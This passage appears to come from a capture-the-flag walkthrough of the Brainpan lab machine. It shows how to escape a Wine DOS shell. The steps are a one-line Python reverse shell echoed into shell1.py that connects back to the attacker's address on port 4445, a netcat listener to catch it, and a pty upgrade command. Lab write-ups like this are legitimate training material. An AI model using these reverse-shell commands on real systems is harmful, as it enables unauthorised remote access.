Escape Wine Shell

Privilege Escalation

Now we need to get out of this garbage wine shell. We have a DOS prompt, which can’t do much so we will need to live off the land. If we issue the “dir” command we see the script responsible for restarting the brainpan server. We can issue “type checksrv.sh” to view the info, and see that its running a python command, witch python located in /usr//bin/python. We can use that binary to spawn a real linux shell.

We create a python file via DOS that when ran will spawn a reverse shell to port 4445 and call it “shell1.py”

echo import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.44.149",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); > shell1.py

Now we run it with python while we listen on our host on port 4445 via netcat (nc -lvp 4445)

/usr/bin/python shell1.py

Now we have a limited shell, which we can upgrade with

python -c 'import pty; pty.spawn("/bin/bash")'